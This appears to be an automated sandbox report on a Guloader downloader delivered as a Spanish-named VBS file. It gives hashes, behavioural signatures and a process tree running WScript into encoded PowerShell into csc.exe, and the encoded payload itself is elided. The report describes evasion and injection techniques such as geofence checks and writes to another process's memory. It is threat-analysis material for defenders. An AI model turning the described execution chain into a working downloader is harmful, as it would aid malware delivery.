Analysis
max time kernel: 90s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 26-09-2022 03:00
Static task: static1

Behavioral task: behavioral1
Sample: SOLICITUD DE OFERTA.vbs
Resource: win7-20220812-en

Behavioral task: behavioral2
Sample: SOLICITUD DE OFERTA.vbs
Resource: win10v2004-20220812-en
General
Target: SOLICITUD DE OFERTA.vbs
Size: 181KB
MD5: 06acdf5de8b3b26b96a9147836decc49
SHA1: c7e68cbbe9a5ec40e10a2013512c24e768b0c53a
SHA256: 12dd0148f02ed0a257b41784311a98b98db4a501f8f94a2b65c5a9bc3cd10451
SHA512: c7fcd25d4e87eaba6996fa07e400d426a36ca07e4e9e723f3e03bd60c0bffd3ca9bfaf1e2eeae49cf0dff85eca0c19b66b0a1904099515478725343a79315cef
SSDEEP: 3072:Fmi1FFbPmgq17iT1Kd5nTuZ6RlZ36CsBFX0FevM8K4Ec5CsW:Fh5rmgqKYn6ZWZ36CsBFXAe3EcwB
Malware Config
Signatures

Guloader, Cloudeye
A shellcode based downloader first seen in 2020.

Blocklisted process makes network request (1 IoCs)
flow | pid | Process
3 | 3208 | WScript.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | WScript.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
4584 | powershell.exe
4584 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4584 | powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
description | pid | Process | procid_target
PID 3208 wrote to memory of 4584 | 3208 | WScript.exe | 83
PID 3208 wrote to memory of 4584 | 3208 | WScript.exe | 83
PID 3208 wrote to memory of 4584 | 3208 | WScript.exe | 83
PID 4584 wrote to memory of 2448 | 4584 | powershell.exe | 85
PID 4584 wrote to memory of 2448 | 4584 | powershell.exe | 85
PID 4584 wrote to memory of 2448 | 4584 | powershell.exe | 85
PID 2448 wrote to memory of 4704 | 2448 | csc.exe | 86
PID 2448 wrote to memory of 4704 | 2448 | csc.exe | 86
PID 2448 wrote to memory of 4704 | 2448 | csc.exe | 86
Processes

C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.vbs"
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3208

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "…"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4584

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.cmdline"
    - Suspicious use of WriteProcessMemory
    PID:2448

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96F5.tmp" "c:\Users\Admin\AppData\Local\Temp\32cqbg5h\CSC14330FB2F81748809BA2D6578EEF2C1.TMP"
      PID:4704
Network
MITRE ATT&CK Enterprise v6
Downloads